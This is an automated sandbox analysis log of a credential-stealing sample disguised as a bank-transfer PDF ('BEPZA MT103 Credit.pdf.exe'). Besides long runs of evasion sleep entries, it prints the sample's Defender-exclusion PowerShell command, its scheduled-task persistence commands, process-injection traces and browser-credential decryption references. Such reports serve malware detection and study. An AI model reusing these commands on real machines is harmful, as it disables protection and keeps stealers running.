Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852 Thread sleep time: -594661s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852 Thread sleep time: -594546s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 5964 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860 Thread sleep count: 34 > 30 Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860 Thread sleep time: -31359464925306218s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860 Thread sleep time: -600000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7840 Thread sleep count: 1821 > 30 Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860 Thread sleep time: -599891s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7840 Thread sleep count: 8014 > 30 Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860 Thread sleep time: -599769s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860 Thread sleep time: -599641s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860 Thread sleep time: -599532s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860 Thread sleep time: -599407s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860 Thread sleep time: -599282s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860 Thread sleep time: -599157s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860 Thread sleep time: -599032s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860 Thread sleep time: -598922s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860 Thread sleep time: -598813s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860 Thread sleep time: -598688s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860 Thread sleep time: -598563s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860 Thread sleep time: -598438s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860 Thread sleep time: -598313s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860 Thread sleep time: -598204s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860 Thread sleep time: -598079s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860 Thread sleep time: -597954s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860 Thread sleep time: -597829s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860 Thread sleep time: -597704s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860 Thread sleep time: -597579s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860 Thread sleep time: -597454s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860 Thread sleep time: -597329s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860 Thread sleep time: -597204s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860 Thread sleep time: -597079s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860 Thread sleep time: -596954s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860 Thread sleep time: -596829s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860 Thread sleep time: -596684s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860 Thread sleep time: -596578s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860 Thread sleep time: -596469s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860 Thread sleep time: -596359s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860 Thread sleep time: -596250s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860 Thread sleep time: -596141s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860 Thread sleep time: -596032s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860 Thread sleep time: -595907s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860 Thread sleep time: -595797s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860 Thread sleep time: -595688s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860 Thread sleep time: -595563s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860 Thread sleep time: -595438s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860 Thread sleep time: -595312s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860 Thread sleep time: -595203s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860 Thread sleep time: -595094s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860 Thread sleep time: -594962s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860 Thread sleep time: -594844s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860 Thread sleep time: -594734s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860 Thread sleep time: -594621s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860 Thread sleep time: -594516s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860 Thread sleep time: -594406s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860 Thread sleep time: -594297s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860 Thread sleep time: -594188s >= -30000s Jump to behavior
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Thread delayed: delay time: 599875 Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Thread delayed: delay time: 599765 Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Thread delayed: delay time: 599656 Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Thread delayed: delay time: 599547 Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Thread delayed: delay time: 599437 Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Thread delayed: delay time: 599328 Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Thread delayed: delay time: 599219 Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Thread delayed: delay time: 599109 Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Thread delayed: delay time: 599000 Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Thread delayed: delay time: 598890 Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Thread delayed: delay time: 598781 Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Thread delayed: delay time: 598672 Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Thread delayed: delay time: 598562 Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Thread delayed: delay time: 598453 Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Thread delayed: delay time: 598344 Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Thread delayed: delay time: 598234 Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Thread delayed: delay time: 598125 Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Thread delayed: delay time: 598015 Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Thread delayed: delay time: 597906 Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Thread delayed: delay time: 597797 Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Thread delayed: delay time: 597687 Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Thread delayed: delay time: 597578 Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Thread delayed: delay time: 597469 Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Thread delayed: delay time: 597359 Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Thread delayed: delay time: 597250 Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Thread delayed: delay time: 597140 Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Thread delayed: delay time: 597031 Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Thread delayed: delay time: 596922 Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Thread delayed: delay time: 596812 Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Thread delayed: delay time: 596703 Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Thread delayed: delay time: 596575 Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Thread delayed: delay time: 596453 Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Thread delayed: delay time: 596343 Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Thread delayed: delay time: 596234 Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Thread delayed: delay time: 596125 Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Thread delayed: delay time: 596015 Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Thread delayed: delay time: 595906 Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Thread delayed: delay time: 595797 Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Thread delayed: delay time: 595687 Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Thread delayed: delay time: 595578 Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Thread delayed: delay time: 595469 Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Thread delayed: delay time: 595359 Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Thread delayed: delay time: 595250 Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Thread delayed: delay time: 595140 Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Thread delayed: delay time: 595031 Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Thread delayed: delay time: 594921 Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Thread delayed: delay time: 594811 Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Thread delayed: delay time: 594661 Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Thread delayed: delay time: 594546 Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Thread delayed: delay time: 599891 Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Thread delayed: delay time: 599769 Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Thread delayed: delay time: 599641 Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Thread delayed: delay time: 599532 Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Thread delayed: delay time: 599407 Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Thread delayed: delay time: 599282 Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Thread delayed: delay time: 599157 Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Thread delayed: delay time: 599032 Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Thread delayed: delay time: 598922 Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Thread delayed: delay time: 598813 Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Thread delayed: delay time: 598688 Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Thread delayed: delay time: 598563 Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Thread delayed: delay time: 598438 Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Thread delayed: delay time: 598313 Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Thread delayed: delay time: 598204 Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Thread delayed: delay time: 598079 Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Thread delayed: delay time: 597954 Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Thread delayed: delay time: 597829 Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Thread delayed: delay time: 597704 Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Thread delayed: delay time: 597579 Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Thread delayed: delay time: 597454 Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Thread delayed: delay time: 597329 Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Thread delayed: delay time: 597204 Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Thread delayed: delay time: 597079 Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Thread delayed: delay time: 596954 Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Thread delayed: delay time: 596829 Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Thread delayed: delay time: 596684 Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Thread delayed: delay time: 596578 Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Thread delayed: delay time: 596469 Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Thread delayed: delay time: 596359
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Thread delayed: delay time: 596250
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Thread delayed: delay time: 596141
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Thread delayed: delay time: 596032
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Thread delayed: delay time: 595907
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Thread delayed: delay time: 595797
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Thread delayed: delay time: 595688
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Thread delayed: delay time: 595563
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Thread delayed: delay time: 595438
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Thread delayed: delay time: 595312
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Thread delayed: delay time: 595203
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Thread delayed: delay time: 595094
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Thread delayed: delay time: 594962
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Thread delayed: delay time: 594844
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Thread delayed: delay time: 594734
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Thread delayed: delay time: 594621
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Thread delayed: delay time: 594516
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Thread delayed: delay time: 594406
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Thread delayed: delay time: 594297
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Thread delayed: delay time: 594188
Source: BEPZA MT103 Credit.pdf.exe, 0000000A.00000002.3711942483.0000000001001000.00000004.00000020.00020000.00000000.sdmp, YEGIgzyAhkvT.exe, 00000010.00000002.3711945481.0000000000FF7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: 0.2.BEPZA MT103 Credit.pdf.exe.415c6d8.2.raw.unpack, UltraSpeed.cs Reference to suspicious API methods: MapVirtualKey(VKCode, 0u)
Source: 0.2.BEPZA MT103 Credit.pdf.exe.415c6d8.2.raw.unpack, FFDecryptor.cs Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
Source: 0.2.BEPZA MT103 Credit.pdf.exe.415c6d8.2.raw.unpack, FFDecryptor.cs Reference to suspicious API methods: hModuleList.Add(LoadLibrary(text9 + "\\mozglue.dll"))
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe"
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe"
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Memory written: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Memory written: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe"
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YEGIgzyAhkvT" /XML "C:\Users\user\AppData\Local\Temp\tmp3E23.tmp"
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Process created: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe "C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe"
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YEGIgzyAhkvT" /XML "C:\Users\user\AppData\Local\Temp\tmp4900.tmp"
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Process created: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe "C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe"
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Process created: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe "C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe"
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Queries volume information: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe VolumeInformation
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
